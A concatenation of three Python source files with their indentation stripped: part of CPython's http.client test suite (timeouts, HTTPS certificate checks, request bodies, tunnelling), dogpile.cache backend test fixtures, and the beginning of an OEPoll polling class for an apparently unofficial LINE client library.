'RESET_CONTENT',
'PARTIAL_CONTENT',
'MULTI_STATUS',
'IM_USED',
'MULTIPLE_CHOICES',
'MOVED_PERMANENTLY',
'FOUND',
'SEE_OTHER',
'NOT_MODIFIED',
'USE_PROXY',
'TEMPORARY_REDIRECT',
'BAD_REQUEST',
'UNAUTHORIZED',
'PAYMENT_REQUIRED',
'FORBIDDEN',
'NOT_FOUND',
'METHOD_NOT_ALLOWED',
'NOT_ACCEPTABLE',
'PROXY_AUTHENTICATION_REQUIRED',
'REQUEST_TIMEOUT',
'CONFLICT',
'GONE',
'LENGTH_REQUIRED',
'PRECONDITION_FAILED',
'REQUEST_ENTITY_TOO_LARGE',
'REQUEST_URI_TOO_LONG',
'UNSUPPORTED_MEDIA_TYPE',
'REQUESTED_RANGE_NOT_SATISFIABLE',
'EXPECTATION_FAILED',
'MISDIRECTED_REQUEST',
'UNPROCESSABLE_ENTITY',
'LOCKED',
'FAILED_DEPENDENCY',
'UPGRADE_REQUIRED',
'PRECONDITION_REQUIRED',
'TOO_MANY_REQUESTS',
'REQUEST_HEADER_FIELDS_TOO_LARGE',
'INTERNAL_SERVER_ERROR',
'NOT_IMPLEMENTED',
'BAD_GATEWAY',
'SERVICE_UNAVAILABLE',
'GATEWAY_TIMEOUT',
'HTTP_VERSION_NOT_SUPPORTED',
'INSUFFICIENT_STORAGE',
'NOT_EXTENDED',
'NETWORK_AUTHENTICATION_REQUIRED',
]
for const in expected:
with self.subTest(constant=const):
self.assertTrue(hasattr(client, const))
class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.source_port = support.find_unused_port()
self.serv.listen()
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = client.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = client.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other than the constructor not barfing as
# this code doesn't deal with setting up an active running SSL server
# for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
# This will prove that the timeout gets through HTTPConnection
# and into the socket.
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
class PersistenceTest(TestCase):
def test_reuse_reconnect(self):
# Should reuse or reconnect depending on header from server
tests = (
('1.0', '', False),
('1.0', 'Connection: keep-alive\r\n', True),
('1.1', '', True),
('1.1', 'Connection: close\r\n', False),
('1.0', 'Connection: keep-ALIVE\r\n', True),
('1.1', 'Connection: cloSE\r\n', False),
)
for version, header, reuse in tests:
with self.subTest(version=version, header=header):
msg = (
'HTTP/{} 200 OK\r\n'
'{}'
'Content-Length: 12\r\n'
'\r\n'
'Dummy body\r\n'
).format(version, header)
conn = FakeSocketHTTPConnection(msg)
self.assertIsNone(conn.sock)
conn.request('GET', '/open-connection')
with conn.getresponse() as response:
self.assertEqual(conn.sock is None, not reuse)
response.read()
self.assertEqual(conn.sock is None, not reuse)
self.assertEqual(conn.connections, 1)
conn.request('GET', '/subsequent-request')
self.assertEqual(conn.connections, 1 if reuse else 2)
def test_disconnected(self):
def make_reset_reader(text):
"""Return BufferedReader that raises ECONNRESET at EOF"""
stream = io.BytesIO(text)
def readinto(buffer):
size = io.BytesIO.readinto(stream, buffer)
if size == 0:
raise ConnectionResetError()
return size
stream.readinto = readinto
return io.BufferedReader(stream)
tests = (
(io.BytesIO, client.RemoteDisconnected),
(make_reset_reader, ConnectionResetError),
)
for stream_factory, exception in tests:
with self.subTest(exception=exception):
conn = FakeSocketHTTPConnection(b'', stream_factory)
conn.request('GET', '/eof-response')
self.assertRaises(exception, conn.getresponse)
self.assertIsNone(conn.sock)
# HTTPConnection.connect() should be automatically invoked
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
def test_100_close(self):
conn = FakeSocketHTTPConnection(
b'HTTP/1.1 100 Continue\r\n'
b'\r\n'
# Missing final response
)
conn.request('GET', '/', headers={'Expect': '100-continue'})
self.assertRaises(client.RemoteDisconnected, conn.getresponse)
self.assertIsNone(conn.sock)
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
class HTTPSTest(TestCase):
def setUp(self):
if not hasattr(client, 'HTTPSConnection'):
self.skipTest('ssl support required')
def make_server(self, certfile):
from test.ssl_servers import make_https_server
return make_https_server(self, certfile=certfile)
def test_attributes(self):
# simple test to check it's storing the timeout
h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
def test_networked(self):
# Default settings: requires a valid cert from a trusted CA
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
h = client.HTTPSConnection('self-signed.pythontest.net', 443)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_networked_noverification(self):
# Switch off cert verification
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl._create_unverified_context()
h = client.HTTPSConnection('self-signed.pythontest.net', 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
h.close()
self.assertIn('nginx', resp.getheader('server'))
resp.close()
@support.system_must_validate_cert
def test_networked_trusted_by_default_cert(self):
# Default settings: requires a valid cert from a trusted CA
support.requires('network')
with support.transient_internet('www.python.org'):
h = client.HTTPSConnection('www.python.org', 443)
h.request('GET', '/')
resp = h.getresponse()
content_type = resp.getheader('content-type')
resp.close()
h.close()
self.assertIn('text/html', content_type)
def test_networked_good_cert(self):
# We feed the server's cert as a validating cert
import ssl
support.requires('network')
selfsigned_pythontestdotnet = 'self-signed.pythontest.net'
with support.transient_internet(selfsigned_pythontestdotnet):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(context.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(context.check_hostname, True)
context.load_verify_locations(CERT_selfsigned_pythontestdotnet)
try:
h = client.HTTPSConnection(selfsigned_pythontestdotnet, 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
except ssl.SSLError as ssl_err:
ssl_err_str = str(ssl_err)
# In the error message of [SSL: CERTIFICATE_VERIFY_FAILED] on
# modern Linux distros (Debian Buster, etc) default OpenSSL
# configurations it'll fail saying "key too weak" until we
# address https://bugs.python.org/issue36816 to use a proper
# key size on self-signed.pythontest.net.
if re.search(r'(?i)key.too.weak', ssl_err_str):
raise unittest.SkipTest(
f'Got {ssl_err_str} trying to connect '
f'to {selfsigned_pythontestdotnet}. '
'See https://bugs.python.org/issue36816.')
raise
server_string = resp.getheader('server')
resp.close()
h.close()
self.assertIn('nginx', server_string)
def test_networked_bad_cert(self):
# We feed a "CA" cert that is unrelated to the server's cert
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_unknown_cert(self):
# The custom cert isn't known to the default trust bundle
import ssl
server = self.make_server(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_good_hostname(self):
# The (valid) cert validates the HTTP hostname
import ssl
server = self.make_server(CERT_localhost)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port, context=context)
self.addCleanup(h.close)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.addCleanup(resp.close)
self.assertEqual(resp.status, 404)
def test_local_bad_hostname(self):
# The (valid) cert doesn't validate the HTTP hostname
import ssl
server = self.make_server(CERT_fakehostname)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_fakehostname)
h = client.HTTPSConnection('localhost', server.port, context=context)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# Same with explicit check_hostname=True
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# With check_hostname=False, the mismatching is ignored
context.check_hostname = False
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=False)
h.request('GET', '/nonexistent')
resp = h.getresponse()
resp.close()
h.close()
self.assertEqual(resp.status, 404)
# The context's check_hostname setting is used if one isn't passed to
# HTTPSConnection.
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.assertEqual(resp.status, 404)
resp.close()
h.close()
# Passing check_hostname to HTTPSConnection should override the
# context's setting.
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not available')
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:443", "www.python.org", 443),
("www.python.org:", "www.python.org", 443),
("www.python.org", "www.python.org", 443),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b",
443)):
c = client.HTTPSConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_tls13_pha(self):
import ssl
if not ssl.HAS_TLSv1_3:
self.skipTest('TLS 1.3 support required')
# just check status of PHA flag
h = client.HTTPSConnection('localhost', 443)
self.assertTrue(h._context.post_handshake_auth)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertFalse(context.post_handshake_auth)
h = client.HTTPSConnection('localhost', 443, context=context)
self.assertIs(h._context, context)
self.assertFalse(h._context.post_handshake_auth)
h = client.HTTPSConnection('localhost', 443, context=context,
cert_file=CERT_localhost)
self.assertTrue(h._context.post_handshake_auth)
class RequestBodyTest(TestCase):
"""Test cases where a request includes a message body."""
def setUp(self):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket("")
self.conn.sock = self.sock
def get_headers_and_fp(self):
f = io.BytesIO(self.sock.data)
f.readline() # read the request line
message = client.parse_headers(f)
return message, f
def test_list_body(self):
# Note that no content-length is automatically calculated for
# an iterable. The request will fall back to send chunked
# transfer encoding.
cases = (
([b'foo', b'bar'], b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
((b'foo', b'bar'), b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
)
for body, expected in cases:
with self.subTest(body):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket('')
self.conn.request('PUT', '/url', body)
msg, f = self.get_headers_and_fp()
self.assertNotIn('Content-Type', msg)
self.assertNotIn('Content-Length', msg)
self.assertEqual(msg.get('Transfer-Encoding'), 'chunked')
self.assertEqual(expected, f.read())
def test_manual_content_length(self):
# Set an incorrect content-length so that we can verify that
# it will not be over-ridden by the library.
self.conn.request("PUT", "/url", "body",
{"Content-Length": "42"})
message, f = self.get_headers_and_fp()
self.assertEqual("42", message.get("content-length"))
self.assertEqual(4, len(f.read()))
def test_ascii_body(self):
self.conn.request("PUT", "/url", "body")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_latin1_body(self):
self.conn.request("PUT", "/url", "body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_bytes_body(self):
self.conn.request("PUT", "/url", b"body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_text_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "w") as f:
f.write("body")
with open(support.TESTFN) as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
# No content-length will be determined for files; the body
# will be sent using chunked transfer encoding instead.
self.assertIsNone(message.get("content-length"))
self.assertEqual("chunked", message.get("transfer-encoding"))
self.assertEqual(b'4\r\nbody\r\n0\r\n\r\n', f.read())
def test_binary_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "wb") as f:
f.write(b"body\xc1")
with open(support.TESTFN, "rb") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("chunked", message.get("Transfer-Encoding"))
self.assertNotIn("Content-Length", message)
self.assertEqual(b'5\r\nbody\xc1\r\n0\r\n\r\n', f.read())
class HTTPResponseTest(TestCase):
def setUp(self):
body = "HTTP/1.1 200 Ok\r\nMy-Header: first-value\r\nMy-Header: \
second-value\r\n\r\nText"
sock = FakeSocket(body)
self.resp = client.HTTPResponse(sock)
self.resp.begin()
def test_getting_header(self):
header = self.resp.getheader('My-Header')
self.assertEqual(header, 'first-value, second-value')
header = self.resp.getheader('My-Header', 'some default')
self.assertEqual(header, 'first-value, second-value')
def test_getting_nonexistent_header_with_string_default(self):
header = self.resp.getheader('No-Such-Header', 'default-value')
self.assertEqual(header, 'default-value')
def test_getting_nonexistent_header_with_iterable_default(self):
header = self.resp.getheader('No-Such-Header', ['default', 'values'])
self.assertEqual(header, 'default, values')
header = self.resp.getheader('No-Such-Header', ('default', 'values'))
self.assertEqual(header, 'default, values')
def test_getting_nonexistent_header_without_default(self):
header = self.resp.getheader('No-Such-Header')
self.assertEqual(header, None)
def test_getting_header_defaultint(self):
header = self.resp.getheader('No-Such-Header',default=42)
self.assertEqual(header, 42)
class TunnelTests(TestCase):
def setUp(self):
response_text = (
'HTTP/1.0 200 OK\r\n\r\n' # Reply to CONNECT
'HTTP/1.1 200 OK\r\n' # Reply to HEAD
'Content-Length: 42\r\n\r\n'
)
self.host = 'proxy.com'
self.conn = client.HTTPConnection(self.host)
self.conn._create_connection = self._create_connection(response_text)
def tearDown(self):
self.conn.close()
def _create_connection(self, response_text):
def create_connection(address, timeout=None, source_address=None):
return FakeSocket(response_text, host=address[0], port=address[1])
return create_connection
def test_set_tunnel_host_port_headers(self):
tunnel_host = 'destination.com'
tunnel_port = 8888
tunnel_headers = {'User-Agent': 'Mozilla/5.0 (compatible, MSIE 11)'}
self.conn.set_tunnel(tunnel_host, port=tunnel_port,
headers=tunnel_headers)
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertEqual(self.conn._tunnel_host, tunnel_host)
self.assertEqual(self.conn._tunnel_port, tunnel_port)
self.assertEqual(self.conn._tunnel_headers, tunnel_headers)
def test_disallow_set_tunnel_after_connect(self):
# Once connected, we shouldn't be able to tunnel anymore
self.conn.connect()
self.assertRaises(RuntimeError, self.conn.set_tunnel,
'destination.com')
def test_connect_with_tunnel(self):
self.conn.set_tunnel('destination.com')
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
# issue22095
self.assertNotIn(b'Host: destination.com:None', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
# This test should be removed when CONNECT gets the HTTP/1.1 blessing
self.assertNotIn(b'Host: proxy.com', self.conn.sock.data)
def test_connect_put_request(self):
self.conn.set_tunnel('destination.com')
self.conn.request('PUT', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
def test_tunnel_debuglog(self):
expected_header = 'X-Dummy: 1'
response_text = 'HTTP/1.0 200 OK\r\n{}\r\n\r\n'.format(expected_header)
self.conn.set_debuglevel(1)
self.conn._create_connection = self._create_connection(response_text)
self.conn.set_tunnel('destination.com')
with support.captured_stdout() as output:
self.conn.request('PUT', '/', '')
lines = output.getvalue().splitlines()
self.assertIn('header: {}'.format(expected_header), lines)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
_fixtures.py
|
import collections
import itertools
import json
import random
from threading import Lock
from threading import Thread
import time
from unittest import TestCase
import pytest
from dogpile.cache import CacheRegion
from dogpile.cache import register_backend
from dogpile.cache.api import CacheBackend
from dogpile.cache.api import CacheMutex
from dogpile.cache.api import NO_VALUE
from dogpile.cache.region import _backend_loader
from . import assert_raises_message
from . import eq_
class _GenericBackendFixture(object):
@classmethod
def setup_class(cls):
backend_cls = _backend_loader.load(cls.backend)
try:
arguments = cls.config_args.get("arguments", {})
backend = backend_cls(arguments)
except ImportError:
pytest.skip("Backend %s not installed" % cls.backend)
cls._check_backend_available(backend)
def tearDown(self):
if self._region_inst:
for key in self._keys:
self._region_inst.delete(key)
self._keys.clear()
elif self._backend_inst:
self._backend_inst.delete("some_key")
@classmethod
def _check_backend_available(cls, backend):
pass
region_args = {}
config_args = {}
extra_arguments = {}
_region_inst = None
_backend_inst = None
_keys = set()
def _region(self, backend=None, region_args={}, config_args={}):
_region_args = {}
# TODO: maybe we use a class-level naming convention instead
# of a dict here so that arguments merge naturally
for cls in reversed(self.__class__.__mro__):
if "region_args" in cls.__dict__:
_region_args.update(cls.__dict__["region_args"])
_region_args.update(**region_args)
_config_args = self.config_args.copy()
_config_args.update(config_args)
def _store_keys(key):
if existing_key_mangler:
key = existing_key_mangler(key)
self._keys.add(key)
return key
self._region_inst = reg = CacheRegion(**_region_args)
existing_key_mangler = self._region_inst.key_mangler
self._region_inst.key_mangler = _store_keys
self._region_inst._user_defined_key_mangler = _store_keys
reg.configure(backend or self.backend, **_config_args)
return reg
def _backend(self):
backend_cls = _backend_loader.load(self.backend)
_config_args = self.config_args.copy()
arguments = _config_args.get("arguments", {})
arguments = {**arguments, **self.extra_arguments}
self._backend_inst = backend_cls(arguments)
return self._backend_inst
class _GenericBackendTest(_GenericBackendFixture, TestCase):
def test_backend_get_nothing(self):
backend = self._backend()
eq_(backend.get_serialized("some_key"), NO_VALUE)
def test_backend_delete_nothing(self):
backend = self._backend()
backend.delete("some_key")
def test_backend_set_get_value(self):
backend = self._backend()
backend.set_serialized("some_key", b"some value")
eq_(backend.get_serialized("some_key"), b"some value")
def test_backend_delete(self):
backend = self._backend()
backend.set_serialized("some_key", b"some value")
backend.delete("some_key")
eq_(backend.get_serialized("some_key"), NO_VALUE)
def test_region_set_get_value(self):
reg = self._region()
reg.set("some key", "some value")
eq_(reg.get("some key"), "some value")
def test_region_set_multiple_values(self):
reg = self._region()
values = {"key1": "value1", "key2": "value2", "key3": "value3"}
reg.set_multi(values)
eq_(values["key1"], reg.get("key1"))
eq_(values["key2"], reg.get("key2"))
eq_(values["key3"], reg.get("key3"))
def test_region_get_zero_multiple_values(self):
reg = self._region()
eq_(reg.get_multi([]), [])
def test_region_set_zero_multiple_values(self):
reg = self._region()
reg.set_multi({})
def test_region_set_zero_multiple_values_w_decorator(self):
reg = self._region()
values = reg.get_or_create_multi([], lambda: 0)
eq_(values, [])
def test_region_get_or_create_multi_w_should_cache_none(self):
reg = self._region()
values = reg.get_or_create_multi(
["key1", "key2", "key3"],
lambda *k: [None, None, None],
should_cache_fn=lambda v: v is not None,
)
eq_(values, [None, None, None])
def test_region_get_multiple_values(self):
reg = self._region()
key1 = "value1"
key2 = "value2"
key3 = "value3"
reg.set("key1", key1)
reg.set("key2", key2)
reg.set("key3", key3)
values = reg.get_multi(["key1", "key2", "key3"])
eq_([key1, key2, key3], values)
def test_region_get_nothing_multiple(self):
reg = self._region()
reg.delete_multi(["key1", "key2", "key3", "key4", "key5"])
values = {"key1": "value1", "key3": "value3", "key5": "value5"}
reg.set_multi(values)
reg_values = reg.get_multi(
["key1", "key2", "key3", "key4", "key5", "key6"]
)
eq_(
reg_values,
["value1", NO_VALUE, "value3", NO_VALUE, "value5", NO_VALUE],
)
def test_region_get_empty_multiple(self):
reg = self._region()
reg_values = reg.get_multi([])
eq_(reg_values, [])
def test_region_delete_multiple(self):
reg = self._region()
values = {"key1": "value1", "key2": "value2", "key3": "value3"}
reg.set_multi(values)
reg.delete_multi(["key2", "key10"])
eq_(values["key1"], reg.get("key1"))
eq_(NO_VALUE, reg.get("key2"))
eq_(values["key3"], reg.get("key3"))
eq_(NO_VALUE, reg.get("key10"))
def test_region_set_get_nothing(self):
reg = self._region()
reg.delete_multi(["some key"])
eq_(reg.get("some key"), NO_VALUE)
def test_region_creator(self):
reg = self._region()
def creator():
return "some value"
eq_(reg.get_or_create("some key", creator), "some value")
@pytest.mark.time_intensive
def test_threaded_dogpile(self):
# run a basic dogpile concurrency test.
# note the concurrency of dogpile itself
# is intensively tested as part of dogpile.
reg = self._region(config_args={"expiration_time": 0.25})
lock = Lock()
canary = []
def creator():
ack = lock.acquire(False)
canary.append(ack)
time.sleep(0.25)
if ack:
lock.release()
return "some value"
def f():
for x in range(5):
reg.get_or_create("some key", creator)
time.sleep(0.5)
threads = [Thread(target=f) for i in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
assert len(canary) > 2
if not reg.backend.has_lock_timeout():
assert False not in canary
@pytest.mark.time_intensive
def test_threaded_get_multi(self):
reg = self._region(config_args={"expiration_time": 0.25})
locks = dict((str(i), Lock()) for i in range(11))
canary = collections.defaultdict(list)
def creator(*keys):
assert keys
ack = [locks[key].acquire(False) for key in keys]
# print(
# ("%s " % thread.get_ident()) + \
# ", ".join(sorted("%s=%s" % (key, acq)
# for acq, key in zip(ack, keys)))
# )
for acq, key in zip(ack, keys):
canary[key].append(acq)
time.sleep(0.5)
for acq, key in zip(ack, keys):
if acq:
locks[key].release()
return ["some value %s" % k for k in keys]
def f():
for x in range(5):
reg.get_or_create_multi(
[
str(random.randint(1, 10))
for i in range(random.randint(1, 5))
],
creator,
)
time.sleep(0.5)
f()
threads = [Thread(target=f) for i in range(5)]
for t in threads:
t.start()
for t in threads:
t.join()
assert sum([len(v) for v in canary.values()]) > 10
for l in canary.values():
assert False not in l
def test_region_delete(self):
reg = self._region()
reg.set("some key", "some value")
reg.delete("some key")
reg.delete("some key")
eq_(reg.get("some key"), NO_VALUE)
@pytest.mark.time_intensive
def test_region_expire(self):
# TODO: ideally tests like these would not be using actual
# time(); instead, an artificial function where the increment
# can be controlled would be preferred. this way tests need not
# have any delay in running and additionally there is no issue
# with very slow processing missing a timeout, as is often the
# case with this particular test
reg = self._region(config_args={"expiration_time": 0.75})
counter = itertools.count(1)
def creator():
return "some value %d" % next(counter)
eq_(reg.get_or_create("some key", creator), "some value 1")
time.sleep(0.85)
# expiration is definitely hit
eq_(reg.get("some key", ignore_expiration=True), "some value 1")
eq_(reg.get_or_create("some key", creator), "some value 2")
# this line needs to run less the .75 sec before the previous
# two or it hits the expiration
eq_(reg.get("some key"), "some value 2")
def test_decorated_fn_functionality(self):
# test for any quirks in the fn decoration that interact
# with the backend.
reg = self._region()
counter = itertools.count(1)
@reg.cache_on_arguments()
def my_function(x, y):
return next(counter) + x + y
# Start with a clean slate
my_function.invalidate(3, 4)
my_function.invalidate(5, 6)
my_function.invalidate(4, 3)
eq_(my_function(3, 4), 8)
eq_(my_function(5, 6), 13)
eq_(my_function(3, 4), 8)
eq_(my_function(4, 3), 10)
my_function.invalidate(4, 3)
eq_(my_function(4, 3), 11)
def test_exploding_value_fn(self):
reg = self._region()
def boom():
raise Exception("boom")
assert_raises_message(
Exception, "boom", reg.get_or_create, "some_key", boom
)
class _GenericSerializerTest(TestCase):
# Inheriting from this class will make test cases
# use these serialization arguments
region_args = {
"serializer": lambda v: json.dumps(v).encode("ascii"),
"deserializer": json.loads,
}
def test_uses_serializer(self):
region = self._region()
backend = region.backend
value = {"foo": ["bar", 1, False, None]}
region.set("k", value)
raw = backend.get_serialized("k")
assert isinstance(raw, bytes)
pipe = raw.find(b"|")
payload = raw[pipe + 1 :]
eq_(payload, self.region_args["serializer"](value))
eq_(region._parse_serialized_from_backend(raw).payload, value)
def test_uses_deserializer(self):
region = self._region()
value = {"foo": ["bar", 1, False, None]}
region.set("k", value)
asserted = region.get("k")
eq_(asserted, value)
# TODO: test set_multi, get_multi
class _GenericMutexTest(_GenericBackendFixture, TestCase):
def test_mutex(self):
backend = self._backend()
mutex = backend.get_mutex("foo")
ac = mutex.acquire()
assert ac
ac2 = mutex.acquire(False)
assert not ac2
mutex.release()
ac3 = mutex.acquire()
assert ac3
mutex.release()
def test_subclass_match(self):
backend = self._backend()
mutex = backend.get_mutex("foo")
assert isinstance(mutex, CacheMutex)
@pytest.mark.time_intensive
def test_mutex_threaded(self):
backend = self._backend()
backend.get_mutex("foo")
lock = Lock()
canary = []
def f():
for x in range(5):
mutex = backend.get_mutex("foo")
mutex.acquire()
for y in range(5):
ack = lock.acquire(False)
canary.append(ack)
time.sleep(0.002)
if ack:
lock.release()
mutex.release()
time.sleep(0.02)
threads = [Thread(target=f) for i in range(5)]
for t in threads:
t.start()
for t in threads:
t.join()
assert False not in canary
def test_mutex_reentrant_across_keys(self):
backend = self._backend()
for x in range(3):
m1 = backend.get_mutex("foo")
m2 = backend.get_mutex("bar")
try:
m1.acquire()
assert m2.acquire(False)
assert not m2.acquire(False)
m2.release()
assert m2.acquire(False)
assert not m2.acquire(False)
m2.release()
finally:
m1.release()
def test_reentrant_dogpile(self):
reg = self._region()
def create_foo():
return "foo" + reg.get_or_create("bar", create_bar)
def create_bar():
return "bar"
eq_(reg.get_or_create("foo", create_foo), "foobar")
eq_(reg.get_or_create("foo", create_foo), "foobar")
class MockMutex(object):
def __init__(self, key):
self.key = key
def acquire(self, blocking=True):
return True
def release(self):
return
class MockBackend(CacheBackend):
def __init__(self, arguments):
self.arguments = arguments
self._cache = {}
def get_mutex(self, key):
return MockMutex(key)
def get(self, key):
try:
return self._cache[key]
except KeyError:
return NO_VALUE
def get_multi(self, keys):
return [self.get(key) for key in keys]
def set(self, key, value):
self._cache[key] = value
def set_multi(self, mapping):
for key, value in mapping.items():
self.set(key, value)
def delete(self, key):
self._cache.pop(key, None)
def delete_multi(self, keys):
for key in keys:
self.delete(key)
register_backend("mock", __name__, "MockBackend")
|
oepoll.py
|
# -*- coding: utf-8 -*-
from .client import LINE
from types import *
import os, sys, threading, time
class OEPoll(object):
OpInterrupt = {}
client = None
__squareSubId = {}
__squareSyncToken = {}
def __init__(self, client):
if type(client) is not LINE:
raise Exception('You need to set LINE instance to initialize OEPoll')
self.client = client
def __fetchOperation(self, revision, count=1):
return self.client.poll.fetchOperations(revision, count)
def __execute(self, op, threading):
try:
if threading:
_td = threading.Thread(target=self.OpInterrupt[op.type](op))
_td.daemon = False
_td.start()
else:
self.OpInterrupt[op.type](op)
except Exception as e:
self.client.log(e)
def addOpInterruptWithDict(self, OpInterruptDict):
self.OpInterrupt.update(OpInterruptDict)
def addOpInterrupt(self, OperationType, DisposeFunc):
self.OpInterrupt[OperationType] = DisposeFunc
def setRevision(self, revision):
self.client.revision = max(revision, self.client.revision)
def singleTrace(self, count=1):
try:
operations = self.__fetchOperation(self.client.revision, count=count)
except KeyboardInterrupt:
exit()
except:
return
if operations is None:
return []
else:
return operations
def trace(self, threading=False):
try:
operations = self.__fetchOperation(self.client.revision)
except KeyboardInterrupt:
exit()
except:
return
for op in operations:
if op.type in self.OpInterrupt.keys():
self.__execute(op, threading)
self.setRevision(op.revision)
def singleFetchSquareChat(self, squareChatMid, limit=1):
if squareChatMid not in self.__squareSubId:
self.__squareSubId[squareChatMid] = 0
if squareChatMid not in self.__squareSyncToken:
self.__squareSyncToken[squareChatMid] = ''
